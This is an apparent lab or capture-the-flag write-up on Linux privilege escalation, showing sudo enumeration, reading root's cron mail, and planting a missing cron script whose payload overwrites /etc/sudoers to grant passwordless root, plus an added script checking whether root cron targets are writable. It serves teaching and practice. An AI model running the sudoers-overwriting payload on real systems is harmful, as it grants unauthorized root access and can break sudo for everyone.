The Challenge

A running Linux server is a complicated beast with dozens of things happening in the background. Admins might at times forget to clean up the system properly when they install/update/remove things. Most of the time, these scenarios can be debugged with error logs. For an attacker, these logs can be a treasure trove! They allow him to understand how everything is running on the server and what kind of errors are happening. Of course, these logs might sometimes be spread over the system in different formats based on the admin's personal preferences.

Your mission is to get a root shell on the box!

Challenge Accepted

First things first, easy wins… sudo -l

student@attackdefense:~$ sudo -l
User student may run the following commands on attackdefense:
    (root) NOPASSWD: /etc/init.d/cron
    (root) NOPASSWD: /etc/init.d/postfix

Now that we know what we can run with sudo, let's start the services. Neither init script gives us a shell directly, but anything they kick off (cron jobs in particular) runs as root, so starting them and watching what changes is the cheapest next step…

student@attackdefense:~$ sudo /etc/init.d/cron start
 * Starting periodic command scheduler cron    [ OK ]
student@attackdefense:~$ sudo /etc/init.d/cron reload
 * Reloading configuration files for periodic command scheduler cron    [ OK ]

Great, cron is running, but we don't really know what we are looking for, so I go for another easy way to find out: list everything under /var whose status changed in the last 5 minutes (-cmin compares the inode change time, so it also catches files that were only just created or had their permissions touched)…

student@attackdefense:/$ find /var -cmin -5 2>/dev/null
/var/spool/postfix/lib/x86_64-linux-gnu
/var/spool/postfix/lib/x86_64-linux-gnu/libnss_dns-2.27.so
/var/spool/postfix/lib/x86_64-linux-gnu/libnss_hesiod.so.2
/var/spool/postfix/lib/x86_64-linux-gnu/libresolv.so.2
/var/spool/postfix/lib/x86_64-linux-gnu/libgcc_s.so.1
/var/spool/postfix/lib/x86_64-linux-gnu/libnss_files.so.2
/var/spool/postfix/lib/x86_64-linux-gnu/libnss_nisplus-2.27.so
/var/spool/postfix/lib/x86_64-linux-gnu/libnss_files-2.27.so
/var/spool/postfix/lib/x86_64-linux-gnu/libresolv-2.27.so
/var/spool/postfix/lib/x86_64-linux-gnu/libnss_compat.so.2
/var/spool/postfix/lib/x86_64-linux-gnu/libnss_compat-2.27.so
/var/spool/postfix/lib/x86_64-linux-gnu/libnss_hesiod-2.27.so
/var/spool/postfix/lib/x86_64-linux-gnu/libnss_nis.so.2
/var/spool/postfix/lib/x86_64-linux-gnu/libnss_dns.so.2
/var/spool/postfix/lib/x86_64-linux-gnu/libnss_nisplus.so.2
/var/spool/postfix/lib/x86_64-linux-gnu/libnss_nis-2.27.so
/var/spool/postfix/incoming
/var/spool/postfix/maildrop
/var/spool/postfix/etc
/var/spool/postfix/etc/host.conf
/var/spool/postfix/etc/nsswitch.conf
/var/spool/postfix/etc/hosts
/var/spool/postfix/etc/services
/var/spool/postfix/etc/ssl/certs/ca-certificates.crt
/var/spool/postfix/etc/resolv.conf
/var/spool/postfix/usr/lib/zoneinfo
/var/spool/postfix/usr/lib/zoneinfo/localtime
/var/spool/postfix/active
/var/mail
/var/mail/root

Something should stand out since we started the services as root… /var/mail/root. Cron mails whatever a job prints to the job's owner, and root's mailbox (normally readable only by root, but readable by us here) is exactly the kind of stray log the challenge text hints at. Let's check it out…

From root@c236e95ceed7  Thu Mar 28 16:42:01 2019
Return-Path: <root@c236e95ceed7>
X-Original-To: root
Delivered-To: root@c236e95ceed7
Received: by c236e95ceed7 (Postfix, from userid 0)
        id BB51C19873EB; Thu, 28 Mar 2019 16:42:01 +0000 (UTC)
From: root@c236e95ceed7 (Cron Daemon)
To: root@c236e95ceed7
Subject: Cron <root@attackdefense> /bin/sh /opt/exec.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 8bit
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=root>
Message-Id: <20190328164201.BB51C19873EB@c236e95ceed7>
Date: Thu, 28 Mar 2019 16:42:01 +0000 (UTC)

/bin/sh: 0: Can't open /opt/exec.sh

student@attackdefense:/$ cat /opt/exec.sh
cat: /opt/exec.sh: No such file or directory

It does not exist, yet a root cron job keeps invoking it with /bin/sh. If we can create /opt/exec.sh, cron will run our script as root on its next pass, and because it is passed to /bin/sh explicitly it needs neither an executable bit nor a shebang. So why don't we try and write the file.
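Before planting anything, the check worth doing is whether we can actually write where root's cron job is looking. The lab makes /opt writable by student, but on a real box the answer varies, so it is worth scripting. The following is an added example and not part of the original write-up: a small sh script that pulls the absolute paths out of a cron mail's Subject line and reports whether the current user can overwrite each one, or create it if it is missing. The function names and the sample mail text are our own, built from the /var/mail/root message above.

```shell
#!/bin/sh
# Added example, not from the original write-up: given the text of a cron
# mail like /var/mail/root above, pull out the absolute paths named in the
# "Subject: Cron <user@host> <command>" line and report whether the current
# user could overwrite each one (or create it, if it is missing but its
# directory is writable). Function names and the sample mail are our own.

# Constructed sample: the headers/body that matter from the mail above.
SAMPLE_MAIL=$(cat <<'EOF'
From: root@c236e95ceed7 (Cron Daemon)
Subject: Cron <root@attackdefense> /bin/sh /opt/exec.sh
X-Cron-Env: <PATH=/usr/bin:/bin>

/bin/sh: 0: Can't open /opt/exec.sh
EOF
)

# Print every absolute path mentioned in the Cron subject line(s), one per line.
cron_targets() {
    printf '%s\n' "$1" \
        | sed -n 's/^Subject: Cron <[^>]*> //p' \
        | tr ' ' '\n' \
        | grep '^/' \
        | sort -u
}

# Classify one path from the job's point of view:
#   writable  - exists and we can modify it (root runs whatever we put there)
#   creatable - missing, but its parent directory lets us create it
#   safe      - neither
classify_path() {
    p=$1
    if [ -e "$p" ]; then
        if [ -w "$p" ]; then echo writable; else echo safe; fi
    else
        d=$(dirname "$p")
        if [ -d "$d" ] && [ -w "$d" ]; then echo creatable; else echo safe; fi
    fi
}

# Run the check over a whole mail; prints "<class> <path>" per target.
check_cron_mail() {
    cron_targets "$1" | while IFS= read -r p; do
        printf '%s %s\n' "$(classify_path "$p")" "$p"
    done
}

# On the lab box this flags /opt/exec.sh as "creatable" because /opt is
# writable by student; elsewhere the answer depends on your own permissions.
check_cron_mail "$SAMPLE_MAIL"
```

Run it as the low-privileged user (as root everything reports as writable, which tells you nothing). A "creatable" or "writable" hit on a root cron target is the same finding this box turns on: root will execute whatever ends up at that path.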

student@attackdefense:/$ echo "echo 'student ALL=(ALL) NOPASSWD:ALL' > /etc/sudoers" > /opt/exec.sh

Wait for cron to run it (or restart cron) and then check that we can sudo everything with no password. One caveat: the payload uses > rather than >>, so it replaces /etc/sudoers wholesale, which is why the two original rules are gone in the output below. Appending instead, or dropping a file into /etc/sudoers.d, would keep them; either way, a syntax error in sudoers locks everyone out of sudo, so keep the line exact…

student@attackdefense:/$ sudo -l
User student may run the following commands on attackdefense:
    (ALL) NOPASSWD: ALL

Awesome, it worked! Now we should all know the next bit by now…

student@attackdefense:/$ sudo /bin/bash
root@attackdefense:/# id
uid=0(root) gid=0(root) groups=0(root)

Awesome, see how just a few simple commands get you to root. I didn't even enumerate first, as I always check for low-hanging fruit: sudo -l is the lowest in my opinion, closely followed by SETUID binaries.